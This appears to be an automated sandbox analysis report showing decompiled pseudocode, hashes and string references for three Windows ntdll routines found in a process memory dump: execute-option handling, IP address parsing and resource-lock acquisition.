API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: f4eba8c3689adf4b268ae8955a235146884fdc09870ee86cd078c6c80a2dd22c
Instruction ID: 3f85302683ed741f074ebff5e299d24a32d49e2c64f217f0a2a2d5c67e7d11fd
Opcode Fuzzy Hash: f4eba8c3689adf4b268ae8955a235146884fdc09870ee86cd078c6c80a2dd22c
Instruction Fuzzy Hash: FD61E4B1E00665AADF34DF59C8909BFBBB6EF84300754C52EE4DB56680D734AA84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 023D7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E023D7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2482088; // 0x77507a08
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E023D7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E023F3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E023ADFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2484218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E023F3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E023B0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E023F3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E023B8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E023F3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0241E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E023F3F92();
					_t38 = 1;
					L2:
					return E023AE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x023d7f08
0x023d7f0f
0x023d7f12
0x023d7f1b
0x023d7f31
0x023f3ead
0x023f3eb4
0x00000000
0x00000000
0x023f3eba
0x023f3ecd
0x023f3ed2
0x023f3ee1
0x023f3ee7
0x023f3eec
0x023f3f12
0x023f3f18
0x023f3f1a
0x00000000
0x00000000
0x023f3f20
0x023f3f26
0x023f3f28
0x00000000
0x00000000
0x023f3f2e
0x023f3f30
0x00000000
0x00000000
0x023f3f3a
0x023f3f3b
0x023f3f53
0x023f3f64
0x023f3f69
0x023f3f6c
0x023f3f6d
0x023f3f6f
0x023fe304
0x023fe30f
0x023fe315
0x023fe31e
0x023fe321
0x023fe327
0x023fe329
0x00000000
0x00000000
0x00000000
0x00000000
0x023fe32f
0x023fe32f
0x023fe337
0x023fe33a
0x023fe33b
0x023fe33d
0x023fe33f
0x023fe341
0x023fe341
0x023fe34e
0x023fe353
0x023fe358
0x023fe35d
0x023fe35f
0x00000000
0x00000000
0x023fe365
0x023fe365
0x023fe368
0x023fe36e
0x00000000
0x00000000
0x023fe374
0x023fe32f
0x023f3f75
0x023f3f7a
0x023f3f7c
0x023f3f7e
0x023f3f86
0x023d7f39
0x023d7f47
0x023d7f47
0x023d7f37
0x023d7f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 023F3F12

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 023FE345
ExecuteOptions, xrefs: 023F3F04
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 023F3EC4
Execute=1, xrefs: 023F3F5E
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 023FE2FB
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 023F3F75
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 023F3F4A

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 7a5d9e12e8b94e5d7943cbc6bf4f8cc49b9a88e395a7afe00e71daa10dd63ed0
Instruction ID: f594aa228365d34bc7154807ae92bd198646a1ed901b2cd37689c7008af0bd82
Opcode Fuzzy Hash: 7a5d9e12e8b94e5d7943cbc6bf4f8cc49b9a88e395a7afe00e71daa10dd63ed0
Instruction Fuzzy Hash: BF419772A8031C7AEF309A94EC99FDBB3BDAF14704F0045A9E605E6091E770DA458F61

Uniqueness

Uniqueness Score: -1.00%

Function 023E0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E023E0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E023B8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E023ADFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E023E0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E023E0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E023E06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E023E06BA(_t135, _t178) == 0 || E023E0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E023E0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E023E0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E023E06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E023E06BA(_t124, _t142) == 0 || E023E0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x023e0b21
0x023e0b24
0x023e0b27
0x023e0b2a
0x023e0b2d
0x023e0b30
0x023e0b33
0x023e0b36
0x023e0b39
0x023e0b3e
0x023e0c65
0x023e0c68
0x023e0c6a
0x023e0c6f
0x0240eb42
0x00000000
0x00000000
0x0240eb48
0x0240eb48
0x023e0c75
0x023e0c7a
0x0240eb54
0x00000000
0x00000000
0x00000000
0x0240eb5a
0x023e0c80
0x023e0c84
0x0240eb98
0x00000000
0x00000000
0x0240eba6
0x023e0cb8
0x023e0cba
0x023e0cd3
0x023e0cda
0x023e0ce4
0x023e0ce9
0x00000000
0x023e0cec
0x023e0c8c
0x0240eb63
0x00000000
0x00000000
0x0240eb70
0x0240eb75
0x0240eb7d
0x00000000
0x00000000
0x0240eb8c
0x00000000
0x0240eb8c
0x023e0c96
0x00000000
0x00000000
0x023e0ca2
0x023e0cac
0x023e0cb4
0x00000000
0x00000000
0x023e0b44
0x023e0b47
0x023e0b49
0x00000000
0x00000000
0x023e0b4f
0x023e0b50
0x00000000
0x00000000
0x023e0b56
0x023e0b62
0x023e0b7c
0x023e0bac
0x023e0a0f
0x0240eaaa
0x00000000
0x0240eac4
0x0240eac4
0x023e0bd0
0x023e0bd0
0x023e0bd4
0x023e0bd9
0x00000000
0x00000000
0x023e0bdb
0x023e0be0
0x0240eb0e
0x023e0a1a
0x00000000
0x023e0a1a
0x0240eb1a
0x0240eb1f
0x0240eb27
0x00000000
0x00000000
0x0240eb36
0x00000000
0x0240eb36
0x023e0bea
0x00000000
0x00000000
0x023e0bf6
0x023e0c00
0x023e0c03
0x023e0c0b
0x00000000
0x023e0c0b
0x0240eaaa
0x00000000
0x023e0a15
0x023e0bb6
0x00000000
0x023e0bc6
0x023e0bc6
0x023e0bcb
0x023e0c15
0x00000000
0x00000000
0x023e0c1d
0x023e0c20
0x023e0c21
0x023e0c24
0x023e0c24
0x023e0c26
0x00000000
0x023e0c26
0x023e0bcd
0x00000000
0x023e0bcd
0x023e0b89
0x023e0b89
0x023e0b90
0x00000000
0x00000000
0x023e0b96
0x00000000
0x023e0b96
0x023e0a04
0x023e0a04
0x023e0b9a
0x023e0b9a
0x023e0b9b
0x023e0b9f
0x00000000
0x00000000
0x00000000
0x023e0ba5
0x023e0ac7
0x023e0aca
0x0240eacf
0x00000000
0x0240eade
0x0240eade
0x0240eae3
0x00000000
0x00000000
0x0240eaf3
0x0240eaf6
0x0240eaf7
0x0240eafe
0x0240eb01
0x00000000
0x0240eb01
0x0240eacf
0x023e0ad0
0x023e0ad4
0x00000000
0x00000000
0x023e0ada
0x023e0ae6
0x023e0c34
0x00000000
0x023e0c47
0x023e0c49
0x023e0c4a
0x023e0c4e
0x023e0c51
0x023e0c54
0x023e0c57
0x023e0c5a
0x00000000
0x00000000
0x00000000
0x023e0c60
0x023e0afb
0x023e0afe
0x023e0b02
0x023e0b05
0x023e0b08
0x00000000
0x023e0b08
0x023e0ae6
0x023e0b44
0x023e09f8
0x023e09f8
0x023e09f9
0x00000000
0x00000000
0x0240eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 023E0BF6
__fassign.LIBCMT ref: 023E0CA2

Strings

:, xrefs: 023E0BA9
:, xrefs: 023E0AC7
., xrefs: 023E0A0C

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 8b593bccfc118dd94d9337c946b4565bcb8135a111d1000af931b4fc47b71e1a
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 85A17D7190022ADADF28CF64C8457BEB7B9BF05708F24886AD453BB2C1D7B4968DCB51

Uniqueness

Uniqueness Score: -1.00%

Function 023E0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E023E0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024801c0;
									_push(_t144);
									_push(0);
									_t51 = E0239F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E023E4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E023F3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E023F3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0242217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E023F3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E023E3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024801c0;
												_push(_t138);
												_push(0);
												_t58 = E0239F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E023E4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E023F3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E023F3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0242217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E023F3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E023E3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E023C5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0239F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E023E3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0239F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E023E3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0239F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E023E3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E023C5329(_t110, _t138);
																_t69 = E023C53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x023e055a
0x023e055d
0x023e0563
0x023e0566
0x023e05d8
0x023e05e2
0x023e05e5
0x00000000
0x023e05e7
0x023e05e7
0x023e05ea
0x023e05f3
0x023e05f3
0x023e0568
0x023e0568
0x023e0568
0x023e0569
0x023e0569
0x023e0569
0x023e056b
0x00000000
0x00000000
0x0240217f
0x02402183
0x0240225b
0x0240225f
0x02402189
0x0240218c
0x0240218f
0x02402194
0x02402199
0x0240219d
0x024021a0
0x024021a2
0x024021ce
0x024021ce
0x024021ce
0x024021d0
0x024021d6
0x024021de
0x024021e2
0x024021e8
0x024021e9
0x024021ec
0x024021f1
0x024021f6
0x00000000
0x00000000
0x024021f8
0x024021fb
0x02402206
0x0240220b
0x0240220c
0x02402217
0x02402226
0x0240222b
0x0240222c
0x0240222f
0x02402232
0x02402235
0x02402235
0x0240223a
0x0240223f
0x02402241
0x02402243
0x02402248
0x02402248
0x0240224d
0x0240224f
0x02402262
0x02402263
0x02402268
0x02402269
0x02402269
0x02402269
0x0240226d
0x00000000
0x00000000
0x02402276
0x02402279
0x0240227e
0x02402283
0x02402287
0x0240228a
0x0240228d
0x0240228f
0x024022bc
0x024022bc
0x024022bc
0x024022be
0x024022c4
0x024022cc
0x024022d0
0x024022d6
0x024022d7
0x024022da
0x024022df
0x024022e4
0x00000000
0x00000000
0x024022e6
0x024022e9
0x024022f4
0x024022f9
0x024022fa
0x02402305
0x02402314
0x02402319
0x0240231a
0x0240231d
0x02402320
0x02402323
0x02402323
0x02402328
0x0240232d
0x0240232f
0x02402331
0x02402336
0x02402336
0x0240233b
0x0240233d
0x02402350
0x02402351
0x02402356
0x02402359
0x02402359
0x0240235b
0x0240235d
0x023c5367
0x023c536b
0x023c5372
0x00000000
0x00000000
0x00000000
0x00000000
0x02402363
0x02402363
0x02402369
0x0240236a
0x0240236c
0x02402371
0x02402373
0x00000000
0x02402379
0x02402379
0x0240237a
0x0240237f
0x0240237f
0x02402385
0x02402386
0x02402389
0x0240238e
0x02402390
0x023c5378
0x023c537c
0x02402396
0x02402396
0x02402397
0x0240239c
0x024023a2
0x024023a3
0x024023a6
0x024023ab
0x024023ad
0x00000000
0x024023b3
0x024023b3
0x024023b4
0x024023b9
0x024023ba
0x024023ba
0x024023bc
0x024023bf
0x00000000
0x00000000
0x023f9153
0x023f9158
0x023f915a
0x023f915e
0x023f9160
0x00000000
0x023f9166
0x023f9166
0x023f9171
0x023f9176
0x023f9176
0x00000000
0x023f9160
0x024023c6
0x024023ce
0x024023d7
0x024023d7
0x024023ad
0x02402390
0x02402373
0x0240233f
0x0240233f
0x00000000
0x0240233f
0x02402291
0x02402291
0x02402293
0x02402295
0x0240229a
0x024022a1
0x024022a3
0x024022a7
0x024022a9
0x00000000
0x00000000
0x024022ab
0x024022ad
0x024022af
0x00000000
0x00000000
0x00000000
0x024022af
0x024022b1
0x024022b4
0x024022b4
0x024022b6
0x023c53be
0x023c53be
0x023c53be
0x023c53c0
0x00000000
0x00000000
0x023c53cb
0x023c53ce
0x023c53d0
0x023c53d4
0x023c53d6
0x00000000
0x023c53d8
0x023c53e3
0x023c53ea
0x023c53ea
0x00000000
0x023c53d6
0x00000000
0x00000000
0x00000000
0x00000000
0x024022b6
0x00000000
0x0240228f
0x02402349
0x0240234d
0x02402251
0x02402251
0x00000000
0x02402251
0x024021a4
0x024021a4
0x024021a6
0x024021a8
0x024021ac
0x024021b6
0x024021b8
0x024021bc
0x024021be
0x00000000
0x00000000
0x024021c0
0x024021c2
0x024021c4
0x00000000
0x00000000
0x00000000
0x024021c4
0x024021c6
0x024021c6
0x024021c8
0x00000000
0x00000000
0x00000000
0x00000000
0x024021c8
0x024021a2
0x00000000
0x02402183
0x023e057b
0x023e057d
0x023e0581
0x023e0583
0x02402178
0x00000000
0x023e0589
0x023e058f
0x023e058f
0x023e0583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02402206

Strings

RTL: Resource at %p, xrefs: 0240221D, 0240230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 024022FC
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0240220E
RTL: Re-Waiting, xrefs: 0240223A, 02402328

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
